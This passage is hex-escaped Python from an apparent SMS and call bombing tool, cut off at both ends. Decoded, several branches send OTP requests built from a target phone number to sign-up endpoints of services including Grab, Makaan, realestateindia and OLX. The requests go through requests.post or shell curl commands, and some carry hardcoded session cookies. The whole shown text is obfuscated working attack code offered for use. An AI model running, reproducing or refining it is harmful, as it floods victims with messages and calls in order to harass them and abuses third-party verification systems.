71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x2c\x61\x72\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x6d\x61\x69\x6c\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x72\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x75\x73\x74\x6f\x6d\x65\x72\x2f\x61\x6a\x61\x78\x2f\x67\x65\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x27\x63\x6f\x64\x65\x3a\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x36\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x65\x74\x68\x6f\x64\x27\x3a\x20\x27\x53\x4d\x53\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65\x27\x3a\x20\x27\x69\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x68\x6f\x6e\x65\x4e\x75\x6d\x62\x65\x72\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x74\x65\x6d\x70\x6c\x61\x74\x65\x49\x44\x27\x3a\x20\x27\x70\x61\x78\x5f\x61\x6e\x64\x72\x6f\x69\x64\x5f\x70\x72\x6f\x64\x75\x63\x74\x69\x6f\x6e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x67\x72\x61\x62\x2e\x63\x6f\x6d\x2f\x67\x72\x61\x62\x69\x64\x2f\x76\x31\x2f\x70\x68\x6f\x6e\x65\x2f\x6f\x74\x70\x27\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x61\x6b\x61\x61\x6e\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x73\x2f\x6e\x63\x2f\x73\x65\x6e\x64\x4f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x2f\x31\x36\x32\x35\x37\x30\x36\x35\x2f\x27\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x6e\x20\x2b\x20\x27\x3f\x63\x61\x6c\x6c\x54\x79\x70\x65\x3d\x6f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6e\x65\x77\x20\x6f\x74\x70\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x64\x20\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x27\x2d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x72\x6b\x65\x74\x69\x6e\x67\x2e\x74\x6c\x6c\x6d\x73\x2e\x63\x6f\x6d\x2f\x65\x6c\x65\x61\x72\x6e\x2f\x61\x70\x69\x2f\x76\x34\x2f\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x69\x6f\x6e\x73\x2f\x70\x68\x6f\x6e\x65\x5f\x63\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6f\x74\x70\x20\x72\x65\x71\x75\x65\x73\x74\x73\x20\x65\x78\x63\x65\x65\x64\x65\x64\x22\x29\x20\x3d\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x35\x38\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x3a\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x22\x20\x2d\x48\x20\x22\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x74\x68\x61\x6e\x6b\x73\x2e\x70\x68\x70\x3f\x6e\x65\x77\x72\x65\x67\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x74\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x65\x6d\x61\x69\x6c\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x62\x6c\x6f\x63\x6b\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x63\x6f\x75\x6e\x74\x72\x79\x3d\x49\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x70\x61\x69\x64\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x74\x79\x70\x65\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x65\x6d\x61\x69\x6c\x3d\x46\x61\x6b\x65\x6d\x61\x6d\x25\x34\x30\x72\x69\x6c\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x6e\x61\x6d\x65\x3d\x46\x61\x6b\x65\x6d\x61\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x63\x6f\x6f\x6b\x69\x5f\x73\x65\x73\x73\x5f\x69\x64\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6e\x61\x6d\x65\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x36\x32\x36\x35\x32\x35\x39\x30\x39\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x31\x30\x33\x33\x30\x37\x39\x33\x33\x31\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x76\x69\x73\x69\x74\x65\x64\x54\x6f\x6b\x65\x6e\x3d\x31\x37\x36\x39\x36\x31\x35\x36\x30\x38\x33\x36\x33\x36\x37\x22\x20\x2d\x64\x20\x5c\x27\x61\x63\x74\x69\x6f\x6e\x5f\x69\x64\x3d\x63\x61\x6c\x6c\x5f\x74\x6f\x5f\x6f\x74\x70\x26\x6d\x6f\x62\x5f\x6e\x75\x6d\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x73\x63\x72\x69\x70\x74\x2f\x69\x6e\x64\x69\x61\x6e\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x66\x6f\x72\x6d\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x30\x2e\x35\x39\x38\x33\x32\x32\x31\x33\x39\x35\x38\x30\x35\x33\x35\x34\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x79\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x34\x34\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x2a\x2f\x2a\x22\x20\x2d\x48\x20\x22\x78\x2d\x6e\x65\x77\x72\x65\x6c\x69\x63\x2d\x69\x64\x3a\x56\x51\x4d\x47\x55\x31\x5a\x56\x44\x78\x41\x42\x55\x31\x6c\x62\x42\x67\x4d\x44\x55\x6c\x49\x3d\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x35\x2e\x30\x2e\x32\x3b\x20\x53\x48\x2d\x30\x34\x47\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6f\x6e\x61\x70\x3d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x2d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x39\x2d\x31\x35\x35\x39\x35\x33\x37\x33\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x76\x3d\x43\x44\x42\x39\x37\x46\x35\x30\x44\x41\x36\x36\x31\x35\x41\x43\x34\x32\x30\x46\x33\x45\x36\x45\x37\x37\x42\x30\x34\x45\x34\x32\x7e\x4f\x6f\x58\x32\x66\x41\x75\x50\x37\x67\x67\x63\x4e\x61\x30\x56\x6a\x7a\x45\x39\x35\x46\x7a\x4a\x4e\x4b\x52\x64\x4a\x6c\x57\x30\x39\x48\x6a\x61\x30\x2f\x63\x79\x73\x49\x47\x46\x31\x73\x4a\x6f\x42\x4f\x37\x69\x30\x6e\x64\x47\x58\x71\x6e\x54\x57\x4c\x61\x75\x6e\x6c\x79\x78\x6b\x74\x48\x4c\x62\x45\x38\x42\x53\x73\x74\x50\x43\x52\x59\x6e\x38\x56\x64\x50\x31\x35\x6c\x76\x55\x78\x4b\x33\x5a\x59\x39\x61\x68\x58\x4f\x53\x67\x77\x41\x69\x64\x78\x77\x58\x64\x31\x6a\x43\x65\x35\x77\x6a\x49\x7a\x59\x62\x69\x58\x70\x35\x65\x4b\x4e\x57\x66\x46\x70\x6f\x77\x68\x46\x62\x70\x78\x6c\x6f\x65\x2b\x53\x72\x62\x69\x45\x30\x59\x48\x4a\x56\x50\x63\x43\x56\x35\x62\x6d\x64\x73\x48\x67\x50\x66\x51\x63\x3d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x41\x4d\x50\x5f\x54\x4f\x4b\x45\x4e\x3d\x25\x32\x34\x4e\x4f\x54\x5f\x46\x4f\x55\x4e\x44\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x68\x69\x6e\x74\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x33\x36\x39\x38\x31\x39\x32\x37\x36\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x36\x36\x35\x36\x38\x38\x37\x35\x33\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x64\x54\x64\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x3d\x67\x6f\x6f\x67\x6c\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x48\x49\x44\x45\x5f\x4f\x4e\x42\x4f\x41\x52\x44\x49\x4e\x47\x5f\x4c\x4f\x43\x41\x54\x49\x4f\x4e\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x3d\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x61\x6b\x5f\x62\x6d\x73\x63\x3d\x33\x30\x37\x43\x35\x33\x31\x31\x46\x42\x30\x30\x41\x33\x46\x34\x45\x38\x35\x36\x41\x46\x46\x45\x31\x41\x39\x44\x30\x30\x30\x42\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x45\x38\x30\x32\x30\x36\x37\x7e\x70\x6c\x46\x5a\x66\x62\x4d\x51\x47\x67\x45\x44\x72\x37\x4f\x57\x56\x65\x39\x46\x76\x71\x66\x54\x32\x34\x5a\x74\x4f\x56\x4d\x61\x6d\x74\x59\x63\x61\x69\x70\x37\x31\x49\x59\x4f\x72\x76\x32\x2b\x53\x51\x36\x66\x6f\x6b\x53\x76\x4d\x6b\x32\x55\x65\x73\x7a\x35\x76\x31\x73\x46\x66\x61\x69\x63\x68\x62\x74\x44\x67\x65\x56\x53\x6a\x33\x74\x65\x33\x76\x58\x4a\x4b\x65\x7a\x53\x57\x67\x76\x6f\x56\x57\x72\x4b\x37\x67\x66\x7a\x46\x72\x4c\x7a\x31\x72\x75\x42\x6d\x30\x4d\x51\x6a\x30\x31\x56\x35\x43\x6d\x70\x61\x54\x72\x36\x74\x52\x67\x44\x52\x53\x4e\x36\x62\x6b\x73\x33\x6e\x71\x76\x4f\x48\x7a\x52\x30\x74\x41\x31\x49\x6f\x71\x66\x44\x66\x71\x32\x4d\x4b\x74\x6d\x44\x6a\x62\x6b\x6e\x43\x49\x35\x46\x6c\x4c\x59\x55\x54\x77\x71\x6c\x6e\x77\x48\x6f\x77\x59\x41\x72\x66\x79\x62\x6e\x32\x6e\x33\x79\x69\x6c\x45\x36\x56\x4b\x48\x6a\x57\x2b\x74\x48\x38\x6b\x71\x6a\x41\x66\x48\x38\x42\x47\x75\x69\x6a\x70\x6d\x4f\x39\x70\x4e\x6b\x67\x6d\x49\x79\x4f\x65\x61\x5a\x49\x56\x4d\x33\x6b\x36\x46\x47\x4f\x4c\x33\x57\x6a\x33\x6a\x4c\x49\x38\x75\x47\x61\x55\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x61\x62\x63\x6b\x3d\x31\x35\x33\x42\x44\x33\x44\x33\x33\x33\x39\x34\x38\x41\x35\x38\x39\x33\x32\x37\x34\x38\x43\x41\x43\x33\x44\x34\x43\x33\x46\x34\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x38\x38\x33\x38\x45\x30\x35\x7e\x30\x7e\x38\x4f\x2b\x75\x64\x78\x64\x47\x33\x38\x73\x42\x46\x54\x50\x5a\x70\x61\x42\x4c\x34\x49\x47\x6a\x37\x65\x55\x63\x4b\x4a\x31\x56\x77\x41\x74\x4a\x35\x32\x47\x4d\x4f\x35\x45\x3d\x7e\x2d\x31\x7e\x2d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x7a\x3d\x42\x44\x36\x36\x35\x44\x39\x31\x39\x46\x37\x43\x36\x46\x41\x38\x33\x37\x34\x46\x31\x39\x36\x34\x34\x35\x35\x39\x36\x34\x33\x36\x7e\x59\x41\x41\x51\x32\x62\x34\x55\x41\x72\x70\x4f\x41\x77\x74\x72\x41\x51\x41\x41\x71\x30\x71\x50\x47\x77\x4e\x6b\x73\x48\x42\x67\x70\x68\x4c\x77\x44\x7a\x77\x66\x42\x6c\x77\x49\x52\x51\x4a\x41\x47\x37\x74\x78\x6d\x6a\x42\x6f\x2f\x6f\x66\x37\x4e\x69\x41\x4a\x39\x33\x67\x79\x2f\x37\x76\x42\x68\x51\x39\x6c\x35\x73\x49\x4b\x64\x77\x74\x6c\x32\x6a\x2b\x55\x34\x62\x79\x73\x32\x48\x68\x68\x35\x74\x5a\x6c\x5a\x4c\x2f\x6a\x71\x64\x6e\x57\x2f\x4a\x72\x67\x6d\x67\x61\x77\x63\x78\x69\x75\x6e\x41\x4a\x33\x32\x42\x62\x59\x39\x55\x74\x6e\x46\x49\x72\x4e\x78\x62\x62\x52\x76\x7a\x51\x43\x59\x6e\x53\x77\x66\x2f\x63\x7a\x39\x61\x37\x6a\x55\x52\x73\x75\x69\x37\x6c\x65\x75\x4c\x61\x56\x6d\x37\x6d\x51\x45\x63\x48\x50\x4f\x74\x43\x36\x67\x35\x6a\x72\x54\x6f\x41\x4d\x54\x62\x64\x41\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x39\x37\x63\x30\x39\x65\x32\x61\x61\x62\x64\x66\x65\x64\x38\x39\x62\x38\x37\x61\x33\x30\x31\x30\x64\x37\x66\x31\x33\x63\x36\x34\x3d\x33\x35\x33\x62\x34\x66\x39\x66\x64\x38\x32\x64\x32\x36\x32\x36\x38\x61\x64\x31\x31\x62\x32\x63\x31\x65\x39\x61\x65\x30\x31\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x71\x73\x74\x61\x74\x75\x73\x3d\x31\x35\x35\x39\x35\x33\x36\x37\x30\x34\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x61\x71\x75\x65\x73\x69\x73\x3d\x70\x61\x6e\x2d\x32\x36\x33\x38\x31\x40\x61\x23\x70\x61\x6e\x2d\x32\x37\x37\x35\x32\x40\x62\x23\x70\x61\x6e\x2d\x33\x30\x30\x34\x33\x40\x62\x23\x70\x61\x6e\x61\x2d\x32\x36\x33\x38\x31\x40\x62\x22\x20\x2d\x64\x20\x5c\x27\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x63\x61\x6c\x6c\x22\x2c\x22\x64\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x22\x3a\x22\x2b\x39\x31\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x7d\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\